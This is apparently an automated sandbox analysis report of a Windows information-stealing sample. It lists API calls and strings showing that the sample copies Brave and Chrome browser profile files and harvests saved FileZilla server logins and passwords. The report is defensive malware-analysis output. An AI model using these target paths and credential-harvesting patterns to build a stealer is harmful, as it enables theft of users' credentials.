                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDFA5
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDFB1
                              • lstrlen.KERNEL32(014587F8), ref: 007BDFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDFF4
                              • lstrlen.KERNEL32(007E1794), ref: 007BDFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE022
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BE02E
                              • lstrlen.KERNEL32(01458AA8), ref: 007BE03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BE06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 007BE0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 007BE0E7
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE11F
                              • lstrlen.KERNEL32(0145CF08), ref: 007BE12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE155
                              • lstrcat.KERNEL32(00000000,?), ref: 007BE15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE19F
                              • lstrcat.KERNEL32(00000000), ref: 007BE1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007BE1F9
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE22F
                              • lstrlen.KERNEL32(01458B08), ref: 007BE23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE261
                              • lstrcat.KERNEL32(00000000,01458B08), ref: 007BE269
                              • lstrlen.KERNEL32(\Brave\Preferences), ref: 007BE274
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE29B
                              • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 007BE2A7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE2CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE30F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE349
                              • DeleteFileA.KERNEL32(?), ref: 007BE381
                              • StrCmpCA.SHLWAPI(?,0145CF80), ref: 007BE3AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE3F4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE41C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE445
                              • StrCmpCA.SHLWAPI(?,01458AA8), ref: 007BE468
                              • StrCmpCA.SHLWAPI(?,014587F8), ref: 007BE47D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE4D9
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007BE4E0
                              • StrCmpCA.SHLWAPI(?,0145D070), ref: 007BE58E
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE5C4
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007BE639
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE678
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE6A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE6C7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE70E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE737
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE75C
                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 007BE776
                              • DeleteFileA.KERNEL32(?), ref: 007BE7D2
                              • StrCmpCA.SHLWAPI(?,01458AB8), ref: 007BE7FC
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE88C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE8B5
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE8EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE916
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE952
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 2635522530-726946144
                              • Opcode ID: 6654c35a73724b5b1a6264644f21d49dcc0c8875920008d86822f9119f104742
                              • Instruction ID: 91c13f8582bc717cb412c95632c068c28e3b027308062ad8d08f310dbe01b8d0
                              • Opcode Fuzzy Hash: 6654c35a73724b5b1a6264644f21d49dcc0c8875920008d86822f9119f104742
                              • Instruction Fuzzy Hash: 48924E7191524ADBDB21EFA4DC89BEE77B9AF44300F444528F846A7352DB38EC46CB90
                              Function 007C18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C18D2
                              • lstrlen.KERNEL32(\*.*), ref: 007C18DD
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C18FF
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 007C190B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1932
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C1947
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007C1967
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007C1981
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C19BF
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C19F2
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1A1A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1A25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1A4C
                              • lstrlen.KERNEL32(007E1794), ref: 007C1A5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1A80
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1AB4
                              • lstrlen.KERNEL32(?), ref: 007C1AC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1AE5
                              • lstrcat.KERNEL32(00000000,?), ref: 007C1AF3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1B19
                              • lstrlen.KERNEL32(014589F8), ref: 007C1B2F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1B59
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1B64
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1B8F
                              • lstrlen.KERNEL32(007E1794), ref: 007C1BA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1BC3
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1BCF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1BF8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1C25
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1C30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1C57
                              • lstrlen.KERNEL32(007E1794), ref: 007C1C69
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1C8B
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1C97
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1CC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1CEF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1CFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1D21
                              • lstrlen.KERNEL32(007E1794), ref: 007C1D33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1D55
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1D61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1D8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1DB9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C1DC4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1DED
                              • lstrlen.KERNEL32(007E1794), ref: 007C1E19
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1E36
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1E42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1E68
                              • lstrlen.KERNEL32(0145CFF8), ref: 007C1E7E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1EB2
                              • lstrlen.KERNEL32(007E1794), ref: 007C1EC6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1EE3
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1EEF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1F15
                              • lstrlen.KERNEL32(0145D3E0), ref: 007C1F2B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1F5F
                              • lstrlen.KERNEL32(007E1794), ref: 007C1F73
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1F90
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1F9C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1FC2
                              • lstrlen.KERNEL32(0144B260), ref: 007C1FD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2000
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C200B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2036
                              • lstrlen.KERNEL32(007E1794), ref: 007C2048
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2067
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C2073
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2098
                              • lstrlen.KERNEL32(?), ref: 007C20AC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C20D0
                              • lstrcat.KERNEL32(00000000,?), ref: 007C20DE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2103
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C213F
                              • lstrlen.KERNEL32(0145CF08), ref: 007C214E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C2176
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C2181
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                              • String ID: \*.*
                              • API String ID: 712834838-1173974218
                              • Opcode ID: 3cf053eb0a3c74165c9191621e2a9e6f5247064738190cbe2797123939cd64b8
                              • Instruction ID: cf2600a815c8292dc430cc0f6ee1668ff302dfb2a3470ee4740c4aaa5a079947
                              • Opcode Fuzzy Hash: 3cf053eb0a3c74165c9191621e2a9e6f5247064738190cbe2797123939cd64b8
                              • Instruction Fuzzy Hash: 6A626E319166569BDB21EF64CC89FAF77B9AF45700F45412CB805A7253DB38ED02CBA0
                              Function 007C3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 007C392C
                              • FindFirstFileA.KERNEL32(?,?), ref: 007C3943
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007C396C
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007C3986
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C39BF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C39E7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C39F2
                              • lstrlen.KERNEL32(007E1794), ref: 007C39FD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3A1A
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3A26
                              • lstrlen.KERNEL32(?), ref: 007C3A33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3A53
                              • lstrcat.KERNEL32(00000000,?), ref: 007C3A61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3A8A
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C3ACE
                              • lstrlen.KERNEL32(?), ref: 007C3AD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3B05
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3B10
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3B36
                              • lstrlen.KERNEL32(007E1794), ref: 007C3B48
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3B6A
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3B76
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3B9E
                              • lstrlen.KERNEL32(?), ref: 007C3BB2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3BD2
                              • lstrcat.KERNEL32(00000000,?), ref: 007C3BE0
                              • lstrlen.KERNEL32(01458B08), ref: 007C3C0B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3C31
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3C3C
                              • lstrlen.KERNEL32(014589F8), ref: 007C3C5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3C84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3C8F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3CB7
                              • lstrlen.KERNEL32(007E1794), ref: 007C3CC9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3CE8
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3CF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3D1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C3D47
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3D52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3D79
                              • lstrlen.KERNEL32(007E1794), ref: 007C3D8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3DAD
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3DB9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3DE2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3E11
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3E1C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3E43
                              • lstrlen.KERNEL32(007E1794), ref: 007C3E55
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3E77
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3E83
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3EAC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3EDB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C3EE6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3F0D
                              • lstrlen.KERNEL32(007E1794), ref: 007C3F1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3F41
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C3F4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3F75
                              • lstrlen.KERNEL32(?), ref: 007C3F89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3FA9
                              • lstrcat.KERNEL32(00000000,?), ref: 007C3FB7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C3FE0
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C401F
                              • lstrlen.KERNEL32(0145CF08), ref: 007C402E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4056
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4061
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C408A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C40CE
                              • lstrcat.KERNEL32(00000000), ref: 007C40DB
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007C42D9
                              • FindClose.KERNEL32(00000000), ref: 007C42E8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 1006159827-1013718255
                              • Opcode ID: 86d30660d8b3d26e53625f35e1444475d9c17cee17504582713806863648c703
                              • Instruction ID: c06d7c7d908f0241e73d0e6d52ad68e4ad82bbdaaaaddfc11b525be9a6ca980c
                              • Opcode Fuzzy Hash: 86d30660d8b3d26e53625f35e1444475d9c17cee17504582713806863648c703
                              • Instruction Fuzzy Hash: 10625F719166569BDB21EF64DC8DFEE77B9AF44700F04852CB805A7252DB38EE02CB90
                              Function 007C6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6995
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007C69C8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6A29
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C6A34
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6A5D
                              • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 007C6A77
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6A99
                              • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 007C6AA5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6AD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6B00
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007C6B35
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6B9D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6BCD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 313953988-555421843
                              • Opcode ID: 7655f69a4f4213e8a7a1738180e2c3e67a2eda4394f971fc9a773e267636492a
                              • Instruction ID: 3fa8aba22042919e87a25db0da953463a158d308e524ebc3657e6bdaab05fea9
                              • Opcode Fuzzy Hash: 7655f69a4f4213e8a7a1738180e2c3e67a2eda4394f971fc9a773e267636492a
                              • Instruction Fuzzy Hash: 8D425D71A15246ABDB21EBB4DC89FAE77B9AF44700F14441CF906EB252DB38DD02CB60
                              Function 007BDB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDBEF
                              • lstrlen.KERNEL32(007E4CA8), ref: 007BDBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDC17
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007BDC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDC4C
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDC8F
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007BDCD0
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007BDCF0
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007BDD0A
                              • lstrlen.KERNEL32(007DCFEC), ref: 007BDD1D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDD7B
                              • lstrlen.KERNEL32(007E1794), ref: 007BDD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDDA3
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDDAF
                              • lstrlen.KERNEL32(?), ref: 007BDDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 007BDDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDE19
                              • lstrlen.KERNEL32(007E1794), ref: 007BDE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BDE6F
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDE7B
                              • lstrlen.KERNEL32(014587F8), ref: 007BDE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDEBB
                              • lstrlen.KERNEL32(007E1794), ref: 007BDEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BDEE6
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDEF2
                              • lstrlen.KERNEL32(01458AA8), ref: 007BDF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDFA5
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDFB1
                              • lstrlen.KERNEL32(014587F8), ref: 007BDFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDFF4
                              • lstrlen.KERNEL32(007E1794), ref: 007BDFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE022
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BE02E
                              • lstrlen.KERNEL32(01458AA8), ref: 007BE03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BE06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 007BE0CD
